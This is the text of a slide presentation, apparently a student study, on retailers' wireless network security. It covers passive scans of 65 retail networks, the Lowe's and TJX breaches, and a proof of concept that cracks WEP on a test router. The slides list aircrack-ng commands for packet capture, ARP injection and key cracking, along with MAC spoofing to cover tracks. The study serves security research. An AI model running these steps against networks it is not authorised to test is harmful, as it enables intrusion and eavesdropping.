Upload
martha-fleming
View
18
Download
2
Tags:
Embed Size (px)
DESCRIPTION
An Empirical Study on Wireless Network Security for Retailers. Khai Tran. Introduction. Retail merchants have been incorporating wireless solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins. - PowerPoint PPT Presentation
Citation preview
An Empirical Study on Wireless Network Security for Retailers
Khai Tran
Introduction Retail merchants have been incorporating wireless
solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins. Apple – wireless handheld devices that provided credit
authorization Starbucks – free Wi-Fi access for AT&T customers or
those who wish to pay a fee $3.99 for two hours Home Depot – wireless handheld devices are used
throughout the store to perform inventory, price changes, and various other tasks.
In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.
Lowe’s and TJX
Lowe’s - 2003 Loosely protected wireless connection in
Southfield, MI branch led to intrusion Trio of hackers (Brian Salcedo, Adam Botbyl, Paul
Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states
TJX - 2005 Two Miami-area Marshalls stores were
compromised due to a breach in their unsecured wireless network
Intruders had access to millions of credit card numbers due to weak data encryption
Purpose
Are Retailers Still Using WEP? Goals:
Scan wireless networks of retailers to determine if networks are secured and what type of security
As a Proof of Concept, setup a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks
WEP (Wired Equivalent Privacy) Introduced in 1997 to secure
802.11 wireless networks Several weaknesses detected in
2001 Simple Initialization Vector (IV)
24-bits Repeats after about 5000 packets
Single shared key Susceptible to eavesdropping
Declared by IEEE in 2004 as failing to meet security requirements
WPA/WPA2 (Wifi Protected Access) Introduced in 2003 to replace
WEP IV is increased from 24 to 48 bits
Re-use of keys is unlikely 256 bit keys as opposed to 128
2^128 Implements TKIP (Temporal Key
Integrity Protocol) to support pre-WPA
Tools Used for Passive Scans OCZ Neutrino netbook
Window XP SP3 Intel Atom (N270) 1.60 GHz, 2.0 GB RAM RealTek RTL8187SE Wireless LAN PCIE
WirelessNetView software Created by Nir Sofer Version 1.26 www.nirsoft.net Why was WirelessNetView chosen for passive
scans?
Cities scannedSacramento Citrus HeightsRoseville OrovilleChico
Sample Scan with WirelessNetView
Scan Results 65 retail networks were scanned over a
period of two weeks
Security Less than 17% (11) were still using WEP to secure
their network Of the 17%, only three (0.5%) were Big Box
retailers while all the others were small local retail shops
Most retailers have adopted WPA
No Security Just over 26% (17) had no security on their
network 13 of these 17 were Big Box retailers
What is BackTrack?
Created by Mati Aharoni and Max Moser Supported by Linux community www.remote-exploit.org Live Linux distro based on Slackware and available
as a Live CD or on USB boot Includes tools such as kismet, metasploit, wireshark Used for pen testing, network security and analysis
Tools Used For Cracking Dell Latitude D820
Window XP SP2 Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM Intel PRO/Wireless 3945ABG
2Wire 3800HGV-B Uverse Router WEP, WPA, WPA2
BackTrack version 3 airmon-ng airodump-ng aireplay-ng aircrack-ng macchanger
Steps to Cracking WEP Spoof MAC address Turn wireless card into monitoring
mode Scan available networks and capture
packets Inject ARP-request packets into
network to generate traffic Feed data to aircrack-ng for password
cracking
Check Wireless Driver
Spoof MAC
Covering your tracks…
Search Available Networks#airodump-ng wifi0
Capture Packets On Target Network airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0
Inject Packets & Attempt to Crack aireplay-ng -3 –b 00:21:7C:4E:89:51 –h 00:11:22:33:44:55 wifi0 aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap
WEP Cracking Demonstration Linksys Wireless-G Router
(WRT54G) SSID - 693TEST MAC – 00:1D:7E:35:AA:6D
Cracking WPA Requires deauthentication from AP and re-authentication
WPA-PSK Cracking Service
www.wpacracker.com
Conclusion
Big Box Retailers Most have either adopted WPA to
secure their network or provided public portals for user authentication
Small & Local Retail Shops A small number are still using WEP
or no security at all
Afterthoughts Residential Wireless Networks
A lot of networks are still using WEP Scan of Nord Ave
182 networks detected 36% (65) are using WEP Out of the 182 networks, 29 are obvious
2WIRE### routers 27 of these are using WEP
2006 survey by A. Bittau, M. Handley, and J. Lackey
400 networks scanned in London 76% WEP, 20% WPA, 4% 802.11i
2,539 networks scanned in Sattle 85% WEP, 14% WPA, 1% 802.11i
2WIRE WEP Networks
Questions?
References Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP?s
Coffin," sp, pp.386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006.
Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp
Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241
Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," ares, pp.1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006
Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot-Tackles-Network-Challenge/
Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438
Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/
Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/
Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," services, pp.368-374, 2007 IEEE Congress on Services (Services 2007), 2007
www.nirsoft.net/about_nirsoft_freeware.html http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-
Service www.aircrack-ng.org